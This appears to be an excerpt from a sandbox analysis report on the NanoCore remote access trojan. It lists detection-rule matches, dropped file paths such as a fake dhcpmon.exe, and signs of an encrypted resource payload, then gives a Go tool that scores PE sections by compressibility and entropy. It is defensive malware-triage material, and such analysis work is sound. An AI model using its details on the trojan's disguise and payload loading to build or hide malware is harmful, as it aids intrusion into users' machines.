Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.fi.exe.4a60000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.4a60000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: dhcpmon.exe.4.dr Static PE information: Section: .rsrc ZLIB complexity 0.999787946429
Source: dhcpmon.exe.4.dr, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: dhcpmon.exe.4.dr, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs Cryptographic APIs: 'CreateDecryptor'
Source: dhcpmon.exe.4.dr, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.0.fi.exe.40000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.0.fi.exe.40000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.fi.exe.40000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.fi.exe.40000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.2.fi.exe.40000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.fi.exe.40000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs Cryptographic APIs: 'TransformFinalBlock'
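The two static findings above, a .rsrc section whose ZLIB complexity is 0.9998 (zlib cannot shrink it, so its contents are encrypted or already compressed) and CreateDecryptor/TransformFinalBlock calls inside obfuscator-renamed classes, are the usual shape of a .NET loader that decrypts its real payload out of its own resources at runtime. The Go program below is an added example, not Joe Sandbox's or the sample's code: it computes the same two triage numbers for every section of a PE file with the standard debug/pe package. It assumes that "ZLIB complexity" means compressed size divided by raw size (the compression level Joe Sandbox uses is not stated, so the figure may differ in the last digits), and the 0.95 flag threshold is a rule of thumb chosen here.

```go
package main

import (
	"bytes"
	"compress/zlib"
	"debug/pe"
	"fmt"
	"math"
	"os"
)

// SectionStat holds the two triage numbers computed for one PE section.
type SectionStat struct {
	Name       string
	Size       int
	Complexity float64 // compressed size / raw size; about 1.0 means incompressible
	Entropy    float64 // Shannon entropy in bits per byte; 8.0 is the maximum
}

// ZlibComplexity compresses data with zlib and returns compressed/original size.
// Assumption: this reproduces the report's "ZLIB complexity" metric.
func ZlibComplexity(data []byte) float64 {
	if len(data) == 0 {
		return 0
	}
	var buf bytes.Buffer
	w, err := zlib.NewWriterLevel(&buf, zlib.BestCompression)
	if err != nil {
		return 0
	}
	w.Write(data)
	w.Close()
	return float64(buf.Len()) / float64(len(data))
}

// ShannonEntropy is the byte-frequency entropy commonly used for packer/crypto triage.
func ShannonEntropy(data []byte) float64 {
	if len(data) == 0 {
		return 0
	}
	var counts [256]int
	for _, b := range data {
		counts[b]++
	}
	n := float64(len(data))
	h := 0.0
	for _, c := range counts {
		if c > 0 {
			p := float64(c) / n
			h -= p * math.Log2(p)
		}
	}
	return h
}

// SectionStats opens a PE file and scores every section from its raw bytes.
func SectionStats(path string) ([]SectionStat, error) {
	f, err := pe.Open(path)
	if err != nil {
		return nil, err
	}
	defer f.Close()
	stats := make([]SectionStat, 0, len(f.Sections))
	for _, s := range f.Sections {
		data, err := s.Data()
		if err != nil {
			return nil, fmt.Errorf("section %s: %w", s.Name, err)
		}
		stats = append(stats, SectionStat{
			Name: s.Name, Size: len(data),
			Complexity: ZlibComplexity(data), Entropy: ShannonEntropy(data),
		})
	}
	return stats, nil
}

// Flag is the rule of thumb applied when reading the report: a section of any real
// size that zlib cannot shrink is almost certainly an encrypted or packed payload.
func Flag(s SectionStat) bool {
	return s.Size >= 4096 && s.Complexity > 0.95
}

func main() {
	if len(os.Args) != 2 {
		fmt.Fprintln(os.Stderr, "usage: sectionstats <pe-file>")
		os.Exit(2)
	}
	stats, err := SectionStats(os.Args[1])
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	for _, s := range stats {
		mark := ""
		if Flag(s) {
			mark = "  <- likely encrypted/packed payload"
		}
		fmt.Printf("%-8s size=%-8d zlib=%.6f entropy=%.3f%s\n", s.Name, s.Size, s.Complexity, s.Entropy, mark)
	}
}
```

Run it against the dropped dhcpmon.exe or fi.exe and the .rsrc line should stand out from .text and .reloc; a resource that scores this high is the first thing to carve out and feed to the decryption routine that the CreateDecryptor references point at.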
